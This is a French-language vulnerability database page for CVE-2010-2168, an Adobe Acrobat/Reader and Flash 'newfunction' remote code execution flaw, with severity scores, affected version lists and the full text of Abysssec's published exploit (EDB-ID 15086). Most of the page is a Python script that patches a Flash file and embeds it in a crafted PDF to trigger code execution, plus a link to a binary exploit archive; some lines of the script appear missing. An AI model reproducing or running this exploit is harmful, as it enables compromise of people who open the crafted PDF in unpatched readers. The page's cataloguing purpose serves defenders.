Faiblesses connexes
Nom de la faiblesse |
Source |
CWE-399 |
Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
9.3 |
AV:N/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 15086
Date de publication : 2010-09-22 22h00 +00:00
Auteur : Abysssec
EDB Vérifié : Yes
__ __ ____ _ _ ____
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| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15086.zip (moaub-23-exploit.zip)
Title : Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability
Version : Adobe Reader 9.3.2
Analysis : http://www.abysssec.com
Vendor : http://www.adobe.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-2168
MOAUB Number : MOAUB-06
import sys
class PDF:
def __init__(self):
self.xrefs = []
self.eol = '\x0a'
self.content = ''
self.xrefs_offset = 0
def header(self):
self.content += '%PDF-1.6' + self.eol
def obj(self, obj_num, data,flag):
self.content += '%d 0 obj' % obj_num
if flag == 1:
self.content += self.eol + '<< ' + data + ' >>' + self.eol
self.content += self.eol + data + self.eol
self.content += 'endobj' + self.eol
def obj_SWFStream(self, obj_num, data, stream):
self.content += '%d 0 obj' % obj_num
self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))
self.content += ' >>' + self.eol
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
self.content += 'endobj' + self.eol
def obj_Stream(self, obj_num, data, stream):
self.content += '%d 0 obj' % obj_num
self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)
self.content += ' >>' + self.eol
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
self.content += 'endobj' + self.eol
def ref(self, ref_num):
return '%d 0 R' % ref_num
def xref(self):
self.xrefs_offset = len(self.content)
self.content += 'xref' + self.eol
self.content += '0 %d' % (len(self.xrefs) + 1)
self.content += self.eol
self.content += '0000000000 65535 f' + self.eol
for i in self.xrefs:
self.content += '%010d 00000 n' % i
self.content += self.eol
def trailer(self):
self.content += 'trailer' + self.eol
self.content += '<< /Size %d' % (len(self.xrefs) + 1)
self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
self.content += 'startxref' + self.eol
self.content += '%d' % self.xrefs_offset
self.content += self.eol
self.content += '%%EOF'
def generate(self):
return self.content
class POC:
def getSWF(self):
fdR = open('flash.swf', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:3673]
command = '\x40\xE8\xD4\xF1\xFF\x33' #newfunction
str2 = strTotal[3679:]
fdW= open('poc.swf', 'wb+')
finalStr = str1+command+str2
return finalStr
except IOError:
print '[*] Error : An IO error has occurred'
def generate_pdf():
poc = POC()
swfFile = 'poc.swf'
pdf = PDF()
pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)
pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)
pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)
pdf.obj_Stream(4, '','')
pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)
pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1)
pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)
pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)
pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)
pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)
pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)
pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)
pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)
pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',poc.getSWF() )
pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)
pdf.obj_Stream(16, '<</Length 0 >> ','')
return pdf.generate()
def main():
if len(sys.argv) != 2:
print 'Usage: python %s [output file name]' % sys.argv[0]
file_name = sys.argv[1]
if not file_name.endswith('.pdf'):
file_name = file_name + '.pdf'
fd = open(file_name, 'wb+')
print '[-] PDF file generated and written to %s' % file_name
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
if __name__ == '__main__':
Products Mentioned
Configuraton 0
Adobe>>Acrobat >> Version 9.0
Adobe>>Acrobat >> Version 9.1
Adobe>>Acrobat >> Version 9.1.1
Adobe>>Acrobat >> Version 9.1.2
Adobe>>Acrobat >> Version 9.1.3
Adobe>>Acrobat >> Version 9.2
Adobe>>Acrobat >> Version 9.3
Adobe>>Acrobat >> Version 9.3.1
Adobe>>Acrobat >> Version 9.3.2
Apple>>Mac_os_x >> Version *
Microsoft>>Windows >> Version *
Configuraton 0
Adobe>>Acrobat_reader >> Version 9.0
Adobe>>Acrobat_reader >> Version 9.1
Adobe>>Acrobat_reader >> Version 9.1.1
Adobe>>Acrobat_reader >> Version 9.1.2
Adobe>>Acrobat_reader >> Version 9.1.3
Adobe>>Acrobat_reader >> Version 9.2
Adobe>>Acrobat_reader >> Version 9.3
Adobe>>Acrobat_reader >> Version 9.3.1
Adobe>>Acrobat_reader >> Version 9.3.2
Apple>>Mac_os_x >> Version *
Microsoft>>Windows >> Version *
Configuraton 0
Adobe>>Acrobat >> Version 8.0
Adobe>>Acrobat >> Version 8.1
Adobe>>Acrobat >> Version 8.1.1
Adobe>>Acrobat >> Version 8.1.2
Adobe>>Acrobat >> Version 8.1.3
Adobe>>Acrobat >> Version 8.1.4
Adobe>>Acrobat >> Version 8.1.5
Adobe>>Acrobat >> Version 8.1.6
Adobe>>Acrobat >> Version 8.1.7
Adobe>>Acrobat >> Version 8.2
Adobe>>Acrobat >> Version 8.2.1
Adobe>>Acrobat >> Version 8.2.2
Apple>>Mac_os_x >> Version *
Microsoft>>Windows >> Version *
Configuraton 0
Adobe>>Acrobat_reader >> Version 8.0
Adobe>>Acrobat_reader >> Version 8.1
Adobe>>Acrobat_reader >> Version 8.1.1
Adobe>>Acrobat_reader >> Version 8.1.2
Adobe>>Acrobat_reader >> Version 8.1.4
Adobe>>Acrobat_reader >> Version 8.1.5
Adobe>>Acrobat_reader >> Version 8.1.6
Adobe>>Acrobat_reader >> Version 8.1.7
Adobe>>Acrobat_reader >> Version 8.2.1
Adobe>>Acrobat_reader >> Version 8.2.2
Apple>>Mac_os_x >> Version *
Microsoft>>Windows >> Version *